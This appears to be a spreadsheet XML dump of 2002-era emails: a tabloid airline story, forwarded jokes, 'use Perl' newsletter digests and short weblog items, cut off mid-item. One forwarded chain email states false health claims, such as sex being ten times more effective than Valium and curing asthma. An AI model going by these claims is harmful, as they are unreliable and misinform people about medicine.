Sep 16, 2002VIRGIN'S latest airliner is being revamped after randy passengers
discovered a tiny cabin was just the place to join the Mile High Club.The ï¿½130million Airbus 340-600 is fitted with a 5ft x 4ft mother and
baby room with a plastic table meant for changing nappies.But couples keep wrecking it by sneaking in for a quick bonk.Virgin has replaced the table several times even though the plane only
came into service a few weeks ago.It is named Claudia Nine after sexy model Claudia Schiffer, 32, who
launched it in July.Now Virgin bosses have asked Airbus to build a stronger table.At first, German engineers responsible for the jet's interior were
baffled by the problem.The table is designed to take the weight of a mum and baby.One Airbus worker said: "We couldn't work it out. Then the penny
dropped. It didn't occur to the Germans that this might happen. It
caused great amusement."The firm say the cost of strengthening the tables will be about ï¿½200.A Virgin spokeswoman said: "Those determined to join the Mile High
Club will do so despite the lack of comforts."We don't mind couples having a good time but this is not something
that we would encourage because of air regulations."The new Airbus is the world's longest airliner, with teasing slogan
"Mine is bigger than yours". Virgin is using it on flights to the Far
East and the US.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Forwarded-by: FlowerDid you know that you can tell from the skin whether a person is
sexually active or not?1. Sex is a beauty treatment. Scientific tests find that when woman
   make love they produce more of the hormone estrogen, which makes
   hair shiny and skin smooth.2. Gentle, relaxed lovemaking reduces your chances of suffering
   dermatitis, skin rashes and blemishes. The sweat produced cleanses
   the pores and makes your skin glow.3. Lovemaking can burn up those calories you piled on during that
   romantic dinner.4. Sex is one of the safest sports you can take up. It stretches
   and tones up just about every muscle in the body. It's more enjoyable
   than swimming 20 laps, and you don't need special sneakers!5. Sex is an instant cure for mild depression. It releases the body
   endorphin into the bloodstream, producing a sense of euphoria and
   leaving you with a feeling of well-being.6. The more sex you have, the more you will be offered. The sexually
   active body gives off greater quantities of chemicals called
   pheromones.  These subtle sex perfumes drive the opposite sex crazy!7. Sex is the safest tranquilizer in the world. IT IS 10 TIMES MORE
   EFFECTIVE THAN VALIUM.8. Kissing each day will keep the dentist away. Kissing encourages
   saliva to wash food from the teeth and lowers the level of the acid
   that causes decay, preventing plaque build-up.9. Sex actually relieves headaches. A lovemaking session can release
   the tension that restricts blood vessels in the brain.10. A lot of lovemaking can unblock a stuffy nose. Sex is a national
    antihistamine. It can help combat asthma and hay fever.ENJOY SEX!
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline MailerHow much does Perl, PHP, Java, or Lisp suck?
    posted by pudge on Wednesday September 18, @08:08 (links)
    http://use.perl.org/article.pl?sid=02/09/17/189201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</si>
  <si>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How much does Perl, PHP, Java, or Lisp suck?+--------------------------------------------------------------------+
| How much does Perl, PHP, Java, or Lisp suck?                       |
|   posted by pudge on Wednesday September 18, @08:08 (links)        |
|   http://use.perl.org/article.pl?sid=02/09/17/189201               |
+--------------------------------------------------------------------+[0]brian_d_foy writes "A long time ago Don Marti started the OS
Sucks-Rules-O-Meter, and Jon Orwant wrote his own Sucks-Rules-O-Meter for
computer languages. Recently Dan Brian improved on that with a little bit
of natural language processing. Now [1]The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ahead?"Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/17/189201Links:
    0. http://www.theperlreview.com
    1. http://www.theperlreview.com/at_a_glance.htmlCopyright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</si>
  <si>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MailerPerlQT 3 Released
    posted by ziggy on Thursday September 19, @10:41 (tools)
    http://use.perl.org/article.pl?sid=02/09/19/1443213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</si>
  <si>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PerlQT 3 Released+--------------------------------------------------------------------+
| PerlQT 3 Released                                                  |
|   posted by ziggy on Thursday September 19, @10:41 (tools)         |
|   http://use.perl.org/article.pl?sid=02/09/19/1443213              |
+--------------------------------------------------------------------+[0]Dom2 writes "As seen on the dot, a new version of [1]PerlQT is out!
Apparently sporting a perl version of [2]uic for developing ui's from
XML. A [3]tutorial is available for those wanting to know more details."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/19/1443213Links:
    0. mailto:dom@happygiraffe.net
    1. http://perlqt.infonium.com/
    2. http://doc.trolltech.com/3.0/uic.html
    3. http://perlqt.infonium.com/dist/current/doc/index.htmlCopyright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</si>
  <si>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MailerYAPC 2003 Call For Venues
    posted by KM on Sunday September 22, @09:08 (news)
    http://use.perl.org/article.pl?sid=02/09/22/1312225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</si>
  <si>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YAPC 2003 Call For Venues+--------------------------------------------------------------------+
| YAPC 2003 Call For Venues                                          |
|   posted by KM on Sunday September 22, @09:08 (news)               |
|   http://use.perl.org/article.pl?sid=02/09/22/1312225              |
+--------------------------------------------------------------------+[0]Yet Another Society/[1]The Perl Foundation is making a call for venues
for the 2003 YAPC::America. Don't forget to check the [2]venue
requirements, the YAPC::Venue module on CPAN, and talk to the organizers
of YAPCs past. The Perl Foundation aims to announce the venue in November
2002.Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/22/1312225Links:
    0. http://yetanother.org
    1. http://perlfoundation.org
    2. http://www.yapc.org/venue-reqs.txtCopyright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</si>
  <si>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MailerThis Week on perl5-porters (16-22 September 2002)
    posted by rafael on Monday September 23, @07:58 (summaries)
    http://use.perl.org/article.pl?sid=02/09/23/125230The Great Perl Monger Cull Of 2002
    posted by ziggy on Monday September 23, @16:38 (news)
    http://use.perl.org/article.pl?sid=02/09/23/2041201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</si>
  <si>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This Week on perl5-porters (16-22 September 2002)
    * The Great Perl Monger Cull Of 2002+--------------------------------------------------------------------+
| This Week on perl5-porters (16-22 September 2002)                  |
|   posted by rafael on Monday September 23, @07:58 (summaries)      |
|   http://use.perl.org/article.pl?sid=02/09/23/125230               |
+--------------------------------------------------------------------+That's on a week like this that you realize that lots of porters are
European (and managed to free themselves for YAPC::Europe.) Or were they,
on the contrary, too busy in the big blue room ? On the other hand, the
number of bug reports stayed at its habitual average level.This story continues at:
    http://use.perl.org/article.pl?sid=02/09/23/125230Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/23/125230
+--------------------------------------------------------------------+
| The Great Perl Monger Cull Of 2002                                 |
|   posted by ziggy on Monday September 23, @16:38 (news)            |
|   http://use.perl.org/article.pl?sid=02/09/23/2041201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emails.If your local group still exists but is no longer listed, then that means
that I don't have an update to date contact for your group. Please [3]let
me know if that's the case."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/23/2041201Links:
    0. mailto:dave@dave.org.uk
    1. http://www.pm.org/groups/
    2. http://www.pm.org/
    3. mailto:user_groups@pm.orgCopyright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</si>
  <si>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MailerUsing Web Services with Perl and AppleScript
    posted by pudge on Wednesday September 25, @08:12 (links)
    http://use.perl.org/article.pl?sid=02/09/25/129231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</si>
  <si>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Using Web Services with Perl and AppleScript+--------------------------------------------------------------------+
| Using Web Services with Perl and AppleScript                       |
|   posted by pudge on Wednesday September 25, @08:12 (links)        |
|   http://use.perl.org/article.pl?sid=02/09/25/129231               |
+--------------------------------------------------------------------+[0]jonasbn writes "An article on [1]Perl, AppleScript, and Web Services
by Randal L. Schwartz has been published on O'ReillyNet." See AppleScript
and Perl work together!Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/25/129231Links:
    0. mailto:jonasbnNO@SPAMe-diot.dk
    1. http://www.oreillynet.com/pub/a/javascript/synd/2002/09/24/applescript_perl.htmlCopyright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</si>
  <si>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MailerThis Week on perl5-porters (23-29 September 2002)
    posted by rafael on Monday September 30, @17:26 (summaries)
    http://use.perl.org/article.pl?sid=02/09/30/2151221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</si>
  <si>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This Week on perl5-porters (23-29 September 2002)+--------------------------------------------------------------------+
| This Week on perl5-porters (23-29 September 2002)                  |
|   posted by rafael on Monday September 30, @17:26 (summaries)      |
|   http://use.perl.org/article.pl?sid=02/09/30/2151221              |
+--------------------------------------------------------------------+This was a nice week, with lots of discussion, on various interesting
topics. Read on for strange bugs, strange fixes, strange error messages,
and as always, the ongoing efforts made to improve Perl 5.This story continues at:
    http://use.perl.org/article.pl?sid=02/09/30/2151221Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/09/30/2151221Copyright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</si>
  <si>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Announcing SouthFlorida.pm+--------------------------------------------------------------------+
| Announcing SouthFlorida.pm                                         |
|   posted by ziggy on Tuesday October 01, @10:50 (groups)           |
|   http://use.perl.org/article.pl?sid=02/10/01/1450259              |
+--------------------------------------------------------------------+[0]jbisbee writes "The South Florida Perl Mongers group is announcing its
first social meeting to be held at [1]The Duck Tavern in Boca Raton, FL
on Tuesday, October 15 at 7:30 PM. Please keep an eye on
[2]southflorida.pm.org for updated news and events concerning
southflorida.pm."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/10/01/1450259Links:
    0. http://www.jbisbee.com/
    1. http://yp.yahoo.com/py/ypMap.py?Pyt=Typ&amp;tuid=B:PB1632346&amp;ck=3694270848&amp;tab=B2C&amp;addr=1835+W+Hillsboro+Blvd&amp;city=Deerfield+Beach&amp;state=FL&amp;zip=33442-1401&amp;country=us&amp;slt=26.318237&amp;sln=-80.128829&amp;cs=9&amp;stat=:pos:3:regular:regT:19:fbT:0
    2. http://southflorida.pm.org/Copyright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</si>
  <si>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MailerAnnouncing SouthFlorida.pm
    posted by ziggy on Tuesday October 01, @10:50 (groups)
    http://use.perl.org/article.pl?sid=02/10/01/1450259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</si>
  <si>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Forwarded-by: Chris Wedgwood 
From: Bert01. I was so poor growing up...  if I wasn't a boy...  I'd have had
    nothing to play with.02. A girl phoned me the other day and said, "Come on over; nobody's
    home."  I went over. Nobody was home.03. During sex, my girlfriend always wants to talk to me.  Just the
    other night she called me from a hotel04. One day I came home early from work...  I saw a guy jogging
    naked. I said to the guy, "Hey buddy, why are you doing that?"  He
    said "Because you came home early."05. It's been a rough day. I got up this morning...  put a shirt on
    and button fell off.  I picked up my briefcase, and the handle
    came off.  I'm afraid to go to the bathroom.06. I was such an ugly kid...  When I played in the sandbox, the cat
    kept covering me up.07. I could tell my parents hated me.  My bath toys were a toaster and
    radio.08. I was such an ugly baby...  My mother never breast fed me. She
    told me that she only liked me as a friend.09. I'm so ugly...  My father carries around a picture of the kid who
    came with his wallet.10. When I was born, the doctor came into the waiting room and said to
    my father, "I'm sorry. We did everything we could, but he pulled
    through."11. I'm so ugly...  My mother had morning sickness...  AFTER I was
    born.12. I remember the time that I was kidnapped and they sent a piece of
    my finger to my father.  He said he wanted more proof.13. Once when I was lost, I saw a policeman, and asked him to help me
    find my parents. I said to him, "Do you think we'll ever find
    them?" He said,"I don't know kid. There's so many places they can
    hide."14. My wife made me join a bridge club. I jump off next Tuesday.15. I'm so ugly...  I worked in a pet shop, and people kept asking how
    big I'd get.16. I went to see my doctor. "Doctor, every morning when I get up and
    I look in the mirror...  I feel like throwing up; What's wrong
    with me?" He said...  "I don't know but your eyesight is perfect."17. I went to the doctor because I'd swallowed a bottle of sleeping
    pills. My doctor told me to have a few drinks and get some rest.18. With my old man I got no respect. I asked him, "How can I get my
    kite in the air?" He told me to run off a cliff.19. Some dog I got. We call him Egypt because in every room he leaves
    a pyramid. His favorite bone is in my arm.  Last night he went on
    the paper four times - three of those times I was reading it.20. One year they wanted to make me poster boy - for birth control.21. My uncle's dying wish was to have me sitting in his lap; he was in
    the electric chair.
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline MailerMailing List Judo movie available
    posted by gnat on Wednesday October 02, @12:47 (news)
    http://use.perl.org/article.pl?sid=02/10/02/1647249Conference Presentation Judo movie available
    posted by gnat on Wednesday October 02, @18:56 (news)
    http://use.perl.org/article.pl?sid=02/10/02/2257211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</si>
  <si>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Mailing List Judo movie available
    * Conference Presentation Judo movie available+--------------------------------------------------------------------+
| Mailing List Judo movie available                                  |
|   posted by gnat on Wednesday October 02, @12:47 (news)            |
|   http://use.perl.org/article.pl?sid=02/10/02/1647249              |
+--------------------------------------------------------------------+[0]gnat writes "Mark-Jason Dominus's [1]Mailing List Judo is now
available from perl.org. Thanks to David Wheeler for recording Mark's
sessions. Conference Presentation Judo will come later today ..."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/10/02/1647249Links:
    0. mailto:gnat@oreilly.com
    1. http://www.perl.org/tpc/2002/movies/
+--------------------------------------------------------------------+
| Conference Presentation Judo movie available                       |
|   posted by gnat on Wednesday October 02, @18:56 (news)            |
|   http://use.perl.org/article.pl?sid=02/10/02/2257211              |
+--------------------------------------------------------------------+[0]gnat writes "Mark-Jason Dominus's [1]Conference Presentation Judo
presentation is online at perl.org. Thanks again to David Wheeler for
recording this at OSCON."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/10/02/2257211Links:
    0. mailto:gnat@oreilly.com
    1. http://www.perl.org/tpc/2002/movies/mjd-conf-judo/Copyright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</si>
  <si>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Forwarded-by: Monty Solomon      New $199 PC Doesn't Do Windows
     - Oct 2, 2002 03:53 PM (AP Online)
     - http://finance.lycos.com/home/news/story.asp?story=28928829By MATTHEW FORDAHL
AP Technology Writer
  It's been about 20 years since a new Atari 400 or Commodore Vic
20 could be had for less than $200. Even then, those relics were
well on their way from bargain bins to the dust bin of PC history.
  Since then, few if any new computers have sold for less than
$200. Any that did were seriously outdated or inoperable.
  Now, in a challenge to established tech giants, several upstarts
have banded together to create a PC that retails for $199.86.
  It doesn't do Windows. In fact, it doesn't do a lot of things.
  The Microtel SYSMAR710, sold only at Wal-Mart's online store,
runs on a Linux operating system variant called Lindows, which has
been hyped as a new choice for consumers who want to break away
from the Microsoft monopoly....     - http://finance.lycos.com/home/news/story.asp?story=28928829
</t>
  </si>
  <si>
    <t xml:space="preserve">
Forwarded-by: Nev Dull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
</t>
  </si>
  <si>
    <t xml:space="preserve">
Forwarded-by: Nev Dull 
Forwarded-by: Gary Bianconi The History of Medicine:  2000 B.C. -- Here, eat this root.
  1000 A.D. -- That root is heathen. Say this prayer.
  1850 A.D. -- That prayer is superstition. Drink this potion.
  1940 A.D. -- That potion is snake oil. Swallow this pill.
  1985 A.D. -- That pill is ineffective. Take this antibiotic.
  2000 A.D. -- That antibiotic is artificial. Here, eat this root.
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily NewsletterIn this issue:
    * Security hole found in the Safe module+--------------------------------------------------------------------+
| Security hole found in the Safe module                             |
|   posted by rafael on Sunday October 06, @06:21 (modules)          |
|   http://use.perl.org/article.pl?sid=02/10/06/1118222              |
+--------------------------------------------------------------------+[0]rafael writes "A security hole has been discovered in Safe.pm. When a
Safe compartment has already been used, there's no guarantee that it's
safe any longer, because there's a way for code executed within the Safe
compartment to alter its operation mask. (Thus, programs that use a Safe
compartment only once aren't affected by this bug.)" Read below for the
fixes...This story continues at:
    http://use.perl.org/article.pl?sid=02/10/06/1118222Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/10/06/1118222Links:
    0. http://use.perl.org/~rafael/Copyright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</si>
  <si>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use Perl Daily NewsletterIn this issue:
    * Installing Perl 5.8.0 on Mac OS X 10.2+--------------------------------------------------------------------+
| Installing Perl 5.8.0 on Mac OS X 10.2                             |
|   posted by pudge on Thursday August 29, @15:03 (releases)         |
|   http://use.perl.org/article.pl?sid=02/08/29/193225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CPAN."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/29/193225Links:
    0. mailto:morbus@disobey.com
    1. http://developer.apple.com/internet/macosx/perl.htmlCopyright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</si>
  <si>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xml:space="preserve">
Forwarded-by: Rob Windsor 
Forwarded-by: "Shirley Baer"
Forwarded-by: cjw59068
Forwarded-by: Joe &amp; Allie GreenoughThere were four buddies golfing and the first guy said, "I had to
promise my wife that I would paint the whole outside of the house
just to go golfing."The second guy said, "I promised my wife that I would remodel the
kitchen for her."The third guy said, "You guys have it easy! I promised my wife that
I would build her a new deck." They continued to play the hole.
Then the first guy said to the fourth guy, "What did you have to
promise your wife?"The fourth guy replied, "I didn't promise anything." All the guys
were shocked, "How did you do it?!" He replied, "It's simple. I
set the alarm clock for 5:30. Then I poked my wife and asked, 'Golf
course or intercourse?' And she said, 'Wear your sweater.'"
</t>
  </si>
  <si>
    <t xml:space="preserve">
Forwarded-by: Nev Dull 
Forwarded-by: Mike Olson 
Forwarded-by: Jim Frew 
Forwarded-by: "Mark Mooney" 
From: the "Vent", Scottsdale Tribune:First they sue the tobacco companies for giving them lung cancer,
then the fast food places for making them fat.
Guess I can sue Budweiser for all the ugly women I've slept with.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Forwarded-by: Nev Dull 
Forwarded-by: Gene Spafford 
Forwarded-by: Sean Ennis 
Forwarded-by: dpbsmith@bellatlantic.net (Daniel P. B. Smith)"I've started referring to the proposed action against Iraq as Desert
Storm 1.1, since it reminds me of a Microsoft upgrade: it's expensive,
most people aren't sure they want it, and it probably won't work."
		-- Kevin G. Barkes
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline MailerPassing the Parrot Pumpkin
    posted by KM on Tuesday October 08, @09:11 (parrot)
    http://use.perl.org/article.pl?sid=02/10/08/1311237The Perl Journal On The Ropes
    posted by pudge on Tuesday October 08, @14:35 (links)
    http://use.perl.org/article.pl?sid=02/10/08/1835219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</si>
  <si>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Passing the Parrot Pumpkin
    * The Perl Journal On The Ropes+--------------------------------------------------------------------+
| Passing the Parrot Pumpkin                                         |
|   posted by KM on Tuesday October 08, @09:11 (parrot)              |
|   http://use.perl.org/article.pl?sid=02/10/08/1311237              |
+--------------------------------------------------------------------+[0]Dan writes "After a good run, Jeff Goff, the current Parrot release
manager and Keeper of the Keys and Source, is passing on the hat. Let's
everyone give a big welcome to Steve Fink, who's agreed to take up the
position." Thanks for the work Jeff... now Steve, get the whip cracking!Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/10/08/1311237Links:
    0. http://yetanother.org/dan/
+--------------------------------------------------------------------+
| The Perl Journal On The Ropes                                      |
|   posted by pudge on Tuesday October 08, @14:35 (links)            |
|   http://use.perl.org/article.pl?sid=02/10/08/1835219              |
+--------------------------------------------------------------------+[0]rochlin writes "Looks like The Perl Journal might not make it up for
air after all. This blurb is on [1]their website. 'Time is running short
and we need your help if The Perl Journal is to get another chance at
being the real deal. As of a couple of minutes ago, we only have 881
subscriptions and the deadline is fast approaching. Please subscribe now.
It only costs 3 cents per day to get the best Perl coverage anywhere.'"
They need 3,000 subscribers to move forward.Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/10/08/1835219Links:
    0. http://www.nw-apts.com
    1. http://www.tpj.com/Copyright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</si>
  <si>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TPF October Newsletter+--------------------------------------------------------------------+
| TPF October Newsletter                                             |
|   posted by pudge on Tuesday October 08, @22:35 (links)            |
|   http://use.perl.org/article.pl?sid=02/10/08/1836210              |
+--------------------------------------------------------------------+[0]delegatrix writes "The October edition of the [1]Perl Foundation
newsletter has been posted. This newsletter includes an interview with
White Camel winner Tim Maher."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/10/08/1836210Links:
    0. mailto:lisa@perl.org
    1. http://perlfoundation.org/index.cgi?page=newsletterCopyright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</si>
  <si>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URL: http://diveintomark.org/archives/2002/09/23.html#new_toys
Date: 2002-09-23T16:50:42-05:00_Shelley Powers_: â€œI thought the stuff this weekend on FOAF was a joke[1]
â€”a bunch of people playing with new toys. ... How does FOAF aid 
aggregation? The author is included with each bit. Why do we need extraneous 
material such as college, and who the author knows?â€ _Seth Russell_: â€œFor example I wanted to know who _you_ were[2]. Only 
thing I had was your posts to this list. So i found "burningbird.net" in your 
email address ... then i did a lot of reading over there. Still don't really 
know who your are and what you are into, what projects you are working on, who 
you know, and why you came here to run your mouth. But if there were a foaf 
button on the feed from this channel, well I just click on that and i'm totally 
into your stuff.â€[1] http://groups.yahoo.com/group/rss-dev/message/3981
[2] http://groups.yahoo.com/group/rss-dev/message/3982
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:12:45:28PM
Date: Mon, 23 Sep 2002 19:45:28 GMTJeremy Zawodny[1] who works at Yahoo Finance offers an RSS 0.91 feed for every 
stock. It's a beta feature. Here's the feed for Microsoft[2] and one for 
Marimba[3]. Thanks to Jon Udell[4] for the pointer. Nice. Jon also notes that 
Microsoft doesn't show up too strong in the weblog world and describes[5] a 
conversation with John Montgomery about this. What a small world. John and I 
got to know each other when we did the work on SOAP in the late 90s, and weblog 
software is one of the major reasons we were interested in SOAP. So close, but 
so far. But it's never too late![1] http://jeremy.zawodny.com/blog/archives/000187.html
[2] http://rss.finance.yahoo.com/rss/get?ticker=MSFT
[3] http://rss.finance.yahoo.com/rss/get?ticker=MRBA
[4] http://weblog.infoworld.com/udell/2002/09/23.html#a422
[5] http://weblog.infoworld.com/udell/2002/09/23.html#a421
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000611
Date: 2002-09-23T23:21:12-06:00Finally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problems!*Enjoy, and get a free bonus prize if you can tell me[2] why it's called TRAMP.[1] http://www.aaronsw.com/2002/tramp
[2] mailto:me@aaronsw.com
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:6:16:41PM
Date: Tue, 24 Sep 2002 01:16:41 GMTHalley[1]: "When is someone going to create _audio fonts_ for Christ's sake."[1] http://halleyscomment.blogspot.com/2002_09_22_halleyscomment_archive.html#85483723
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000609
Date: 2002-09-23T00:51:21-06:00I've received an _incredibly kind invitation_; I sure hope I can take it! I 
feel sort of bad though, because I think other people deserve it more than I 
do. Hm, the next few weeks are pretty crazy: *Thu 26:* Edward Tufte Course[1] and MSI[2] member's night, Chicago.
*Fri 27:* OSCOM[3], Berkeley. Bookmobile launch[4], SF. _(Unlikely to attend.)_
*SatSun:* Hoshana Rabba, Shemini Atzeret, Simchat Torah. _(Jewish Holidays)_
*30-Oct3:* OSXCON[5], Santa Clara. _(Need someplace to stay. Anyone?)_
*Mon 7:* Bernstein's oral argument in crypto export case[6], San Francisco. _
(Ditto.)_
*Tues 8:* Bookmobile[7] arrives in D.C.
*Wed 9:* Lessig's oral argument in Eldred case[8], D.C.[1] http://www.edwardtufte.com/tufte/courses
[2] http://msichicago.org/
[3] http://www.oscom.org/conferences/berkeley2002/
[4] http://webdev.archive.org/texts/bookmobile-open_house.php
[5] http://conferences.oreillynet.com/macosx2002/
[6] http://export.cr.yp.to
[7] http://webdev.archive.org/texts/bookmobile.php
[8] http://eldred.cc/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:24:12AM
Date: Mon, 23 Sep 2002 15:24:12 GMTNY Times piece[1] on reporters with weblogs.[1] http://www.nytimes.com/2002/09/23/technology/23BLOG.html?ex=1033358400&amp;en=a34d8a401c775a55&amp;ei=5007&amp;partner=USERLAND
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:12:00:00AM
Date: 1/1/1904; 12:00:00 AMPhil Wolff: Dave Winer books I'll buy[1]. _Sweet! _[1] http://dijest.com/aka/2002/09/23.html#a2082
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481626
Date: Not suppliedDVDSynth is an open source project that allows you to splice in your own 
footage, alternate audio, subtitles, etc, to any DVD. This means that you can 
insert your own non-sucky subtitles, make and circulate edit-lists that make 
highlight reels for your favorite movies, etc, etc. It all amounts to a sweet 
tool for making the audience into the _former audience_, participants in 
entertainment. Of course, it's also illegal under the DMCA, since the tool also 
necessarily circumvents the copy-prevention in pre-recorded DVDs to accomplish 
its ends. Link[1] Discuss[2] (_via NTK[3]_)[1] http://www.roundelay.net/dvdsynth/prerelease.html
[2] http://www.quicktopic.com/boing/H/ymptgyYcJan
[3] http://www.ntk.net/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:25:14AM
Date: Mon, 23 Sep 2002 15:25:14 GMTSheila Lennon was interviewed[1] for the Times piece.[1] http://www.lennon2.com/sept23.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481566
Date: Not suppliedGreat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Markoffcharney!_)[1] http://www.salon.com/tech/feature/2002/09/23/antiglobal_geeks/index.html
[2] http://www.quicktopic.com/boing/H/gSpjZZSBcWc84
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85483339
Date: Not suppliedTonight on the Style Network's TV show "Area," my house will be featured 
undergoing a Hawaiiana makeover. Watch it and meet Carla, my daughter, and me. 
It'll play Monday at 9:30 pm ET. (If someone can tape it for me, I'd appreciate 
it, because my cable service doesn't get the Style channel. I'll send you a new 
T-shirt iron on of a girl and her pet slug. Email mark@well.com.) Link[1] 
Discuss[2][1] http://www.stylenetwork.com/Shows/Area/
[2] http://www.quicktopic.com/16/H/FtMUhwVP3JS6E
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481526
Date: Not suppliedThe good folks at ResearchBuzz have released a groovy Google API tool, "The 
Suffix Census." Enter your search terms, and the census will tell you how many 
of the results are in .NET, .COM, .ORG, and other top-level domains. Link[1] 
Discuss[2] (_via ResearchBuzz[3]_)[1] http://www.buzztoolbox.com/google/suffixcensus.shtml
[2] http://www.quicktopic.com/boing/H/k9WDFNMrPbW5
[3] http://www.researchbuzz.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85483138
Date: Not suppliedArticle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don't know anything about the Irish Travelers, but I'm wondering if they are 
getting a bad rap about being con-artists. This Irish Traveler FAQ[1] says 
"some Travellers are con men, but, just like other Americans, most are not." 
Link[2] Discuss[3][1] http://www.pitt.edu/~alkst3/USA.html
[2] http://www.wndu.com/news/contact16/contact16_2450.php
[3] http://www.quicktopic.com/16/H/umA3qpRqVJkRm
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481504
Date: Not suppliedCarny concessionaires have taken to selling deep-friend Twinkies, doing big 
business with artery-clogging horripilations:     In what may be the biggest setback for the war on fat since supersize 
    fries, Americans are scarfing down thousands of the gooey, calorie-laden 
    snack cakes at county fairs and restaurants across the country.     "We sold 26,000 Twinkies in 18 days. People drove for hours just to taste 
    our Twinkie," said Rocky Mullen, who sells the deep-fried, cream-filled 
    treats for $3 (U.S.) each at the Payallup Fair, 50 kilometres south of 
    Seattle.     As if Twinkies are not sweet enough already, vendors such as Mr. Mullen add 
    chocolate or berry sauce and sprinkle powdered sugar on top...     Hearing about Mr. Sell's invention, Hostess, the company that makes the 
    71-year-old snack, started promoting deep-fried Twinkies to state and 
    county fairs, where a captive population of junk-food addicts began 
    gobbling them up between pig races and tractor-pull competitions.     How bad are they for your health? After deep-frying, a Twinkie packs an 
    estimated 400 calories and 28 grams of fat.  Link[1] Discuss[2][1] http://www.globeandmail.com/servlet/ArticleNews/PEstory/TGAM/20020923/UFATTN/Headlines/headdex/headdexInternational_temp/13/13/22/
[2] http://www.quicktopic.com/boing/H/PyMFa6sCswPya
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:30:51AM
Date: Mon, 23 Sep 2002 15:30:51 GMTSlashdot reports[1] that Amazon still wants to patent the Web.[1] http://slashdot.org/article.pl?sid=02/09/23/1156216&amp;mode=thread&amp;tid=155
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85481344
Date: Not suppliedAaron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Discuss[2][1] http://www.warchalking.org/story/2002/9/22/223831/236
[2] http://www.quicktopic.com/boing/H/vsVYCTZE7hs
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:4:27:03PM
Date: Mon, 23 Sep 2002 23:27:03 GMTNews.Com[1]: "Amazon.com is hoping to use more than the honor system to protect 
a payment method it established online last year."[1] http://rss.com.com/2100-1017-959046.html?type=ptâˆ‚=rss&amp;tag=feed&amp;subj=news
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:59:58PM
Date: Tue, 24 Sep 2002 03:59:58 GMT"rssflowersalignright"I've gotten to know Phil Ringalda over the last few weeks 
in all the discussions about RSS 2.0, and I like him, and would like to work 
with him in the future. I don't say that lightly. This evening he posted a note
[1] on his weblog that he was giving up trying to get RDF to make sense inside 
RSS. As I read his essay I could feel two-plus years of exhaustion overwhelm 
me. I found myself writing a comment after his essay saying, among other things 
"RSS is not a brilliant format. It is a compromise. It is for syndicating news 
feeds. That's all it is for, for the 18,000th time." It's time for RDF to pack 
its bags and leave. RSS deserves some dignity, as does RDF. Emphatically, once 
and for all, they are not the same thing. Peace be with you RDF. Leave RSS 
alone. Thank you.[1] http://philringnalda.com/archives/002330.php
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:12:00:00AM
Date: 1/1/1904; 12:00:00 AMGold Lake Mountain Resort[1] looks pretty gooood. Man there are a lot of cool 
relaxing places to stay in Colorado. Keep the suggestions coming. [1] http://www.goldlake.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85482094
Date: Not suppliedJanis Ian, a brave and talented recording artist (and budding and talented 
science fiction writer) has done a terrific interview with the Slashdot 
groupmind about her views on the music industry.     Seriously, diversity is something record companies can't afford anymore - 
    not the majors, at any rate. I'd go to this article, posted at Linux 
    Journal, which quotes a Newsweet article (July 15,2002) by Steven Levy 
    saying "So why are the record labels taking such a hard line? My guess is 
    that it's all about protecting their Internet-challenged business model. 
    Their profit comes from blockbuster artists. If the industry moved to a 
    more varied ecology, independent labels and artists would thrive--to the 
    detriment of the labels, which would have trouble rustling up the rubes to 
    root for the next Britney. The smoking gun comes from testimony of an 
    RIAA-backed economist who told the government fee panel that a dramatic 
    shakeout in Webcasting is "inevitable and desirable because it will bring 
    about market consolidation." That's really it in a nutshell. "Market 
    consolidation" means the less artists they have to promote, the less 
    ultimate dollars they'll spend. The smaller the playlist, the greater the 
